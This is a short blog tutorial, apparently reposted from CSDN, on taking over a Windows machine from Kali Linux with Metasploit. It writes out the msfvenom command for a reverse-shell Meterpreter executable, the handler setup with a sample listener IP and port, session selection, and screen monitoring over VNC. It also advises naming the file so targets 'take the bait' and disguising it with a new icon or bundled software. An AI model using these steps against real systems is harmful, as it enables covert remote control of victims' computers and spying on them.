Kali Penetration Windows

Table of contents

1. Premise:

2. Process:

1. Enter administrator mode:

 2. Generate executable files

3. Run the msfconsole command

4. Configuration parameters

 5. Open the executable file on the target machine

6. View users

7. Monitor the computer screen of the target machine


1. Premise:

Install the virtual machine, install the Windows system and the kali system on the virtual machine.

Software: msfvenom , msfconsole (built-in in Kali system)

2. Process:

1. Enter administrator mode:

sudo su

 Enter the Kali password after executing the command, the password is hidden, just enter it and press Enter

 

 2. Generate executable files

Order:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<local ip> LPORT=<local port number> –f exe –o <filename>.exe

Explanation: Local ip writes the IP address of your own Kali, and you can check your Kali's IP address with ifconfig

The local port can be set to an unoccupied port number. If the port number is occupied, the file will fail to be generated, just change the port number.

You can name the file whatever you like. You can write a name that is easy for the target host to take the bait.

Of course, MSF can also be used to infiltrate mobile phones, mac, Linux, etc.

This is the IP address of the Kali host

Next run the command to generate the file

The default generated files are in the root directory

 Put the file just generated into the target machine Win10 system

3. Run the msfconsole command

Order:

msfconsole

 

4. Configuration parameters

(1) Command: use exploit/multi/handler (select module)

(2) Command: set payload windows/meterpreter/reverse_tcp (select attack module)

(3) Command: set LhOST 192.168.32.1 (fill in the IP address of your own host)

(4) Command: set lport 1111 (fill in the port number when the file was just generated)

(5) Command: show options (view setting parameters)

(6) Command: exploit -z -j (background execution)

 

 After the parameters are set, open the program on the target machine and execute the command in step 6, or you can directly enter the command exploit to start the attack

 5. Open the executable file on the target machine

We can also disguise this program here, change its icon, or bundle it with some software, and when the user opens it, it will be automatically installed on the other party's computer

6. View users

(1) Command: sessions (view hooked users)

(2) Command: sessions -i 1 (select the user who needs to attack, choose the first one here)

When meterpreter appears, you have successfully invaded the other party's computer

7. Monitor the computer screen of the target machine

 Order:

run vnc -i

 

 

 

Guess you like

Origin blog.csdn.net/m0_51786204/article/details/129926296